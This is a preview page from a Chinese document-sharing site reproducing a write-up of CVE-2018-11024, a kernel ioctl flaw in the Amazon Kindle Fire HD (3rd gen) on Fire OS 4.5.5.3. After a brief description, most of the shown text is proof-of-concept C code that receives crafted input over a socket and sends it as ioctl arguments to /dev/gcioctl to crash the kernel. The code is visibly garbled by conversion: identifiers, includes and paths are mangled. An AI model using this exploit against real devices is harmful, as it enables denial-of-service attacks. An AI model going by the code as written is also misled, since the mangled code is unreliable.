(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

上传人:王** 文档编号:497117 上传时间:2023-09-21 格式:DOCX 页数:15 大小:24.15KB
下载 相关 举报
(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第1页
第1页 / 共15页
(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第2页
第2页 / 共15页
(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第3页
第3页 / 共15页
(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第4页
第4页 / 共15页
(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第5页
第5页 / 共15页
(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第6页
第6页 / 共15页
(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第7页
第7页 / 共15页
(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第8页
第8页 / 共15页
(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第9页
第9页 / 共15页
(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第10页
第10页 / 共15页
亲,该文档总共15页,到这儿已超出免费预览范围,如果喜欢就下载吧!
资源描述

《(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(15页珍藏版)》请在优知文库上搜索。

1、(CVE-2018-11024) Amazon Kindle Fire HD (3rd) Fire OS kernel 组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd) FireOS 4.5.5.3 的内核组件中的内核模块 omapdriversmiscgcxgcioctlgcif.c 允许攻击者通过设备/ dev 上 ioctl 的参数 注入特制参数/gcioctl使用命令1077435789并导致内核崩溃。二、漏洞影响Fire OS 4.5.5.3三、复现过程poc#include #include /strlen#include#include /inet_

2、addr#include /write#include #include #include #include #include / Socket boilerplate code taken from here: http:/ server-client-example-c-sockets-Iinux/ *seed, ioctl-idj num-mappingsj num-blobs dev-name-lenj dev-name map_e ntry_t_arr, blobs*/int debug = 1;typedef struct int src_id;int dst_id;int off

3、set; map_entry_t;short tiny_vals18 = 128, 127, 64, 63, 32, 31, 16, 15, 8, 7t % 3, 2,1, 0, 256, 255, -1;int *small_vals;int num_small_vals;/ populates small_vals when calledvoid populate_arrs(int top) int num = 1;int count = 0;while (num top) /printf(,%dn num);num = 1;small_vals = malloc(sizeof(int)*

4、count);memset(small_vals, 0, count);int i = 0;while(num 1) small_valsi = num;i+;small-valsi = num-1;i+;num = 1;small_valsi = 0;small_valsi+l = top;small_valsi+2 = top-1;small_valsi+3 = -1;)/ generate a random value of size size and store it in elem./ value has a weight % chance to be a small valuevo

5、id gen_rand_val(int size, char *elemj int small_weight) int i;if (rand() % 100) small_weight) / do small thingunsigned int idx = (rand() % num_small_vals); printf(Choosing %dn, small-valsidx);switch (size) case 2:idx = (rand() % 18);(short *)elem = tiny_valsidx; break;case 4:*(int *)elem = small_val

6、sidx; break;case 8:*(long long*)elem = small_valsidx;break;default:printf(Damn bro. Size: %dn,j size);exit(-l);else for(i=0; i size; i+) elemi = (char)(rand ()%0xl00);int main(int argc i char *argv)int num_blobs = 0, num_mappings = j i = 0, dev_name_len = 0, j;unsigned int ioctl_id = 0;char *dev_nam

7、e;void *tmp;char *ptr_arr;int *len_arr;unsigned int seed;int sockfd , client_sock i c , read_size;struct sockaddr_in server , client;int msg_size;void *generic_arr264;/ max val for small_vals arrayint top = 8192;int ent = 0;/ chance that our generics are filled with small vals,int default_weight = 5

8、0;populate_arrs(top);int retest = 1;goto rerun;sockfd = socket(AF_INET , SOCK_STREAM , 0);if (sockfd = -1) (printf(nCould not create socket);puts(,Socket created);setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &(int) 1 , sizeof(in t);server.sin_family = AF_INET;server.sin_addr.s_addr = INADDR_ANY;serv

9、er.sin_port = htons(atoi(argvl);/Bindif( bind(sockfdj(struct sockaddr *)&server , sizeof(server) 0) /print the error messageperror(bind failed. Error*1);return 1;puts(,bind done);listen:/ Listenlisten(sockfd , 3);puts(Waiting for incoming connections.);c = sizeof(struct sockaddr_in);/ accept connect

10、ion from an incoming clientclient_sock = accept(sockfd, (struct sockaddr *)&client, (socklen_t *)&c);if (client_sock 0 ) ( recv the entire messagechar *recv_buf = calloc(msg_size, sizeof(char);if (recv_buf = NULL) printf(Failed to allocate recv_bufn);exit(-l);int nrecvd = recv(client_sock, recv_bufj

11、 msg_size, 0);if (nrecvd != msg_size) printf(Error getting all data!n);printf(,nrecvd: %dnmsg_size:%dn, nrecvd, msg_size); eit(-l);/ quickly save a copy of the most recent dataint savefd = open(sdcardsaved, O_WRONLYO_TRUNCO_CREAT, 06 44);if (savefd 0) perror(open saved); exit(-l);int err = Write(SaV

12、efd, recv_bufj msg_size);if (err != msg_size) perror(write saved); exit(-l);fsync(savefd);close(savefd);rerun:if (retest) recv_buf = calloc(msg_sizej sizeof(char);int fd = open(,sdcardsavedj O_RDONLY);if (fd 0) perror(open:);exit(-l);int fsize = lseek(fd, 0, SEEK_END);printf(file size: %dn, fsize);l

13、seek(fdj 0, SEEK_SET); read(fdj recv_buffsize);)char *head = recv_buf;seed = 0;/seed, ioctl-idj num_mappings, num-blobsj dev_name_len, dev_na me, map_entry_t_arri blob-len-arrj blobsmemcpy(8tseedj head, 4);head += 4;memcpy(Sioctl-idj head, 4);head += 4;memcpy(&num_mappings, head, 4);head += 4;memcpy(Snum-blobsj head, 4);head += 4;memcpy(&dev_name_len, head, 4);head += 4;/ srand with new seed srand(seed);* dev name */dev_name = calloc(dev-name-len+lj sizeof(char);

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > IT计算机 > windows相关

copyright@ 2008-2023 yzwku网站版权所有

经营许可证编号:宁ICP备2022001189号-2

本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。装配图网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知装配图网,我们立即给予删除!